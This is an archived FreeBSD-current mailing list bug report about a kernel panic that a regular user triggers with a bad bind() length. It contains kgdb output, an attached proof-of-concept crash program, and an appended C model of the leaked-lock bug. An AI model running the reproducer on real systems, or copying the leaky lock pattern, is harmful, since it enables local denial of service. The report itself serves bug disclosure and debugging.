From owner-freebsd-current@FreeBSD.ORG Sat Apr 3 13:21:08 2004
From: "Ryan Sommers" <ryans@gamersimpact.com>
To: current@freebsd.org
Date: Sat, 3 Apr 2004 14:21:08 -0700 (MST)
Subject: Panic from bad length parameter in bind (Possible DOS attack)
Message-ID: <49165.65.103.5.228.1081027268.squirrel@www2.neuroflux.com>
List-Id: Discussions about the use of FreeBSD-current

Whenever I supply a length of 4 as the final bind parameter I get the following panic. Looks like bind returns fine; however, when the program exits it stumbles over some mutex associated with the descriptor. The mutex passed to mtx_destroy() has MTX_RECURSED set. I attempted to find where the call to bind was clobbering the mutex but couldn't. I attached the simple program to exploit this.
I was able to do it as a regular user.

panic: Assertion (m->mtx_lock & (MTX_RECURSED|MTX_CONTESTED)) == 0 failed at /usr/src/sys/kern/kern_mutex.c:848

panic messages:
---
panic: Assertion (m->mtx_lock & (MTX_RECURSED|MTX_CONTESTED)) == 0 failed at /usr/src/sys/kern/kern_mutex.c:848
at line 848 in file /usr/src/sys/kern/kern_mutex.c
Debugger("panic")
Dumping 511 MB
 16 32 48 64 80 96 112 128 144 160 176 192 208 224 240 256 272 288 304 320 336 352 368 384 400 416 432 448 464 480 496
---
Reading symbols from /boot/kernel/radeon.ko...done.
Loaded symbols for /boot/kernel/radeon.ko
Reading symbols from /boot/kernel/acpi.ko...done.
Loaded symbols for /boot/kernel/acpi.ko
Reading symbols from /usr/obj/usr/src/sys/LILSHADOW/modules/usr/src/sys/modules/linux/linux.ko.debug...done.
Loaded symbols for /usr/obj/usr/src/sys/LILSHADOW/modules/usr/src/sys/modules/linux/linux.ko.debug
#0  doadump () at /usr/src/sys/kern/kern_shutdown.c:240
240		dumping++;
(kgdb) bt
#0  doadump () at /usr/src/sys/kern/kern_shutdown.c:240
#1  0xc042b962 in db_fncall (dummy1=0, dummy2=0, dummy3=-1067086860, dummy4=0xdc56f924 " ìfÀXùVÜ\026\032[ÀXùVÜ\203\032[À\220\a") at /usr/src/sys/ddb/db_command.c:551
#2  0xc042b768 in db_command (last_cmdp=0xc0645640, cmd_table=0x0, aux_cmd_tablep=0xc0615ef0, aux_cmd_tablep_end=0xc0615ef4) at /usr/src/sys/ddb/db_command.c:348
#3  0xc042b848 in db_command_loop () at /usr/src/sys/ddb/db_command.c:475
#4  0xc042dfdd in db_trap (type=3, code=0) at /usr/src/sys/ddb/db_trap.c:73
#5  0xc05b7d41 in kdb_trap (type=3, code=0, regs=0xdc56fa50) at /usr/src/sys/i386/i386/db_interface.c:172
#6  0xc05c7b0c in trap (frame= {tf_fs = -1067515880, tf_es = -1068695536, tf_ds = 16, tf_edi = 1, tf_esi = -1067469665, tf_ebp = -598279532, tf_isp = -598279556, tf_ebx = 0, tf_edx = 0, tf_ecx = -1061076992, tf_eax = 18, tf_trapno = 3, tf_err = 0, tf_eip = -1067745359, tf_cs = 8, tf_eflags = 662, tf_esp = -598279480, tf_ss = -598279500}) at /usr/src/sys/i386/i386/trap.c:579
#7  0xc05b7fb1 in Debugger (msg=0xc05fc09b "panic") at machine/cpufunc.h:60
#8  0xc04bec03 in __panic (file=0xc05fb46e "/usr/src/sys/kern/kern_mutex.c", line=848, fmt=0xc05fb49f "Assertion %s failed at %s:%d") at /usr/src/sys/kern/kern_shutdown.c:536
#9  0xc04b7706 in mtx_destroy (m=0x0) at /usr/src/sys/kern/kern_mutex.c:848
#10 0xc052b554 in in_pcbdetach (inp=0xc4257ca8) at /usr/src/sys/netinet/in_pcb.c:697
#11 0xc053807a in tcp_close (tp=0x0) at /usr/src/sys/netinet/tcp_subr.c:746
#12 0xc053c152 in tcp_disconnect (tp=0xc42598b8) at /usr/src/sys/netinet/tcp_usrreq.c:1251
#13 0xc053b164 in tcp_usr_detach (so=0x0) at /usr/src/sys/netinet/tcp_usrreq.c:179
#14 0xc04f0d0c in soclose (so=0xc4238e10) at /usr/src/sys/kern/uipc_socket.c:380
#15 0xc04e3cea in soo_close (fp=0x0, td=0xc41b2690) at /usr/src/sys/kern/sys_socket.c:244
#16 0xc04a7c7f in fdrop_locked (fp=0xc41dc7f8, td=0xc41b2690) at /usr/src/sys/sys/file.h:292
#17 0xc04a7078 in fdrop (fp=0xc41dc7f8, td=0xc41b2690) at /usr/src/sys/kern/kern_descrip.c:1883
#18 0xc04a704b in closef (fp=0xc41dc7f8, td=0xc41b2690) at /usr/src/sys/kern/kern_descrip.c:1869
#19 0xc04a68f3 in fdfree (td=0xc41b2690) at /usr/src/sys/kern/kern_descrip.c:1586
#20 0xc04abf73 in exit1 (td=0xc41b2690, rv=-256) at /usr/src/sys/kern/kern_exit.c:253
#21 0xc04abb14 in exit1 (td=0xc41b2690, rv=277) at /usr/src/sys/kern/kern_exit.c:98
#22 0xc05c8277 in syscall (frame= {tf_fs = 47, tf_es = 47, tf_ds = 47, tf_edi = -1077940988, tf_esi = -1077940980, tf_ebp = -1077941044, tf_isp = -598278796, tf_ebx = 672344908, tf_edx = 672417764, tf_ecx = 671526944, tf_eax = 1, tf_trapno = 12, tf_err = 2, tf_eip = 671871511, tf_cs = 31, tf_eflags = 662, tf_esp = -1077941072, tf_ss = 47}) at /usr/src/sys/i386/i386/trap.c:1004
#23 0x280bf217 in ?? ()
---Can't read userspace from dump, or kernel process---
(kgdb) up 10
#10 0xc052b554 in in_pcbdetach (inp=0xc4257ca8) at /usr/src/sys/netinet/in_pcb.c:697
697		INP_LOCK_DESTROY(inp);
(kgdb) list
692		}
693		if (inp->inp_options)
694			(void)m_free(inp->inp_options);
695		ip_freemoptions(inp->inp_moptions);
696		inp->inp_vflag = 0;
697		INP_LOCK_DESTROY(inp);
698	#ifdef MAC
699		mac_destroy_inpcb(inp);
700	#endif
701		uma_zfree(ipi->ipi_zone, inp);
(kgdb) print inp->inp_mtx
$1 = {mtx_object = {lo_class = 0xc062933c, lo_name = 0xc060548b "inp", lo_type = 0xc06064c4 "tcpinp", lo_flags = 4915200, lo_list = {tqe_next = 0x0, tqe_prev = 0x0}, lo_witness = 0x0}, mtx_lock = 3290113681, mtx_recurse = 1}
(kgdb) print *inp
$2 = {inp_hash = {le_next = 0x0, le_prev = 0x0}, inp_list = {le_next = 0xc4258000, le_prev = 0xc0655f7c}, inp_flow = 0, inp_inc = {inc_flags = 0 '\0', inc_len = 0 '\0', inc_pad = 0, inc_ie = {ie_fport = 0, ie_lport = 0, ie_dependfaddr = {ie46_foreign = {ia46_pad32 = {0, 0, 0}, ia46_addr4 = { s_addr = 0}}, ie6_foreign = {__u6_addr = { __u6_addr8 = '\0' , __u6_addr16 = {0, 0, 0, 0, 0, 0, 0, 0}, __u6_addr32 = {0, 0, 0, 0}}}}, ie_dependladdr = {ie46_local = { ia46_pad32 = {0, 0, 0}, ia46_addr4 = {s_addr = 0}}, ie6_local = {__u6_addr = { __u6_addr8 = '\0' , __u6_addr16 = {0, 0, 0, 0, 0, 0, 0, 0}, __u6_addr32 = {0, 0, 0, 0}}}}}}, inp_ppcb = 0x0, inp_pcbinfo = 0xc0655f80, inp_socket = 0xc4238e10, inp_label = 0x0, inp_flags = 0, inp_sp = 0x0, inp_vflag = 0 '\0', inp_ip_ttl = 64 '@', inp_ip_p = 0 '\0', inp_depend4 = {inp4_ip_tos = 0 '\0', inp4_options = 0x0, inp4_moptions = 0x0}, inp_depend6 = {inp6_options = 0x0, inp6_outputopts = 0x0, inp6_moptions = 0x0, inp6_icmp6filt = 0x0, inp6_cksum = 0, inp6_ifindex = 0, inp6_hops = 0}, inp_portlist = {le_next = 0x0, le_prev = 0x0}, inp_phd = 0x0, inp_gencnt = 13, inp_mtx = {mtx_object = {lo_class = 0xc062933c, lo_name = 0xc060548b "inp", lo_type = 0xc06064c4 "tcpinp", lo_flags = 4915200, lo_list = {tqe_next = 0x0, tqe_prev = 0x0}, lo_witness = 0x0}, mtx_lock = 3290113681, mtx_recurse = 1}}
(kgdb) down
#9  0xc04b7706 in mtx_destroy (m=0x0) at /usr/src/sys/kern/kern_mutex.c:848
848			MPASS((m->mtx_lock & (MTX_RECURSED|MTX_CONTESTED)) == 0);
(kgdb) list
843		LOCK_LOG_DESTROY(&m->mtx_object, 0);
844
845		if (!mtx_owned(m))
846			MPASS(mtx_unowned(m));
847		else {
848			MPASS((m->mtx_lock & (MTX_RECURSED|MTX_CONTESTED)) == 0);
849
850			/* Tell witness this isn't locked to make it happy. */
851			WITNESS_UNLOCK(&m->mtx_object, LOP_EXCLUSIVE, __FILE__,
852			    __LINE__);
(kgdb) info args
m = (struct mtx *) 0x0
(kgdb) info locals
No locals.
(kgdb) up
#10 0xc052b554 in in_pcbdetach (inp=0xc4257ca8) at /usr/src/sys/netinet/in_pcb.c:697
697		INP_LOCK_DESTROY(inp);
(kgdb) info args
inp = (struct inpcb *) 0xc4257ca8
(kgdb) info locals
so = (struct socket *) 0xc4238e10
ipi = (struct inpcbinfo *) 0xc0655f80
(kgdb) quit

-- 
Ryan "leadZERO" Sommers
Gamer's Impact President
ryans@gamersimpact.com
ICQ: 1019590
AIM/MSN: leadZERO
-= http://www.gamersimpact.com =-

Attachment serv.c (decoded from the base64 MIME part):

#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/types.h>

int
main()
{
	struct sockaddr_in servsaddr;
	int fd;

	fd=socket(AF_INET, SOCK_STREAM, 0);
	bind(fd, (struct sockaddr *)&servsaddr, 4);
}
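The $1 value above decodes as an inp mutex still owned by the exiting thread (3290113681 is 0xc41b2691: the td pointer 0xc41b2690 seen in frames 15 through 21 with the low MTX_RECURSED bit set) together with mtx_recurse = 1, so one acquire on this pcb was never matched by a release before the close-time destroy. The C model below is an added example, not FreeBSD code: it shows how a length check that returns early after taking the lock produces exactly that destroy-time state, beside the balanced form that releases on every path; the MTX_UNOWNED value and the model_* helpers are assumptions of the model.

```c
#include <errno.h>
#include <stdint.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define MTX_RECURSED 0x1u   /* low bit of mtx_lock; the flag the kern_mutex.c:848 MPASS tests */
#define MTX_UNOWNED  0x4u   /* "no owner" marker; value assumed for this model */
/* Minimal model of struct mtx: owner (thread pointer with flag bits) and recursion count. */
struct mtx { uintptr_t mtx_lock; unsigned mtx_recurse; };

static void model_mtx_lock(struct mtx *m, uintptr_t td) {
	if (m->mtx_lock == MTX_UNOWNED) { m->mtx_lock = td; return; }
	m->mtx_lock |= MTX_RECURSED;    /* owner re-acquires: flag it and count it */
	m->mtx_recurse++;
}
static void model_mtx_unlock(struct mtx *m) {
	if (m->mtx_recurse == 0) { m->mtx_lock = MTX_UNOWNED; return; }
	if (--m->mtx_recurse == 0) m->mtx_lock &= ~(uintptr_t)MTX_RECURSED;
}

/* The destroy-time check from the trace: an owned lock may be destroyed only if not recursed. */
static int model_mtx_destroy_panics(const struct mtx *m) {
	return m->mtx_lock != MTX_UNOWNED && (m->mtx_lock & MTX_RECURSED) != 0;
}

/* Length check after taking the pcb lock, with an early return that skips the unlock. */
static int bind_leaky(struct mtx *inp, uintptr_t td, socklen_t namelen) {
	model_mtx_lock(inp, td);
	if (namelen != sizeof(struct sockaddr_in)) return EINVAL;   /* lock leaked here */
	model_mtx_unlock(inp);
	return 0;
}

/* Same check, but every exit from the locked region releases the lock. */
static int bind_balanced(struct mtx *inp, uintptr_t td, socklen_t namelen) {
	int error = 0;
	model_mtx_lock(inp, td);
	if (namelen != sizeof(struct sockaddr_in)) error = EINVAL;
	model_mtx_unlock(inp);
	return error;
}

/* bind() with the given namelen, then close: detach takes the lock once and destroys it.
 * Returns 1 if the mtx_destroy() assertion would fire, 0 if the close is clean. */
static int close_after_bind(int (*bindfn)(struct mtx *, uintptr_t, socklen_t), socklen_t namelen) {
	struct mtx inp = { MTX_UNOWNED, 0 };
	uintptr_t td = 0xc41b2690u;    /* the exiting thread's address from the backtrace */
	(void)bindfn(&inp, td, namelen);
	model_mtx_lock(&inp, td);
	return model_mtx_destroy_panics(&inp);
}
```

With the leaky bind and namelen 4 the model ends with mtx_recurse = 1 and the recursed bit set, the same state kgdb printed for $1; with the balanced bind the same bad length is rejected with EINVAL and the close is clean.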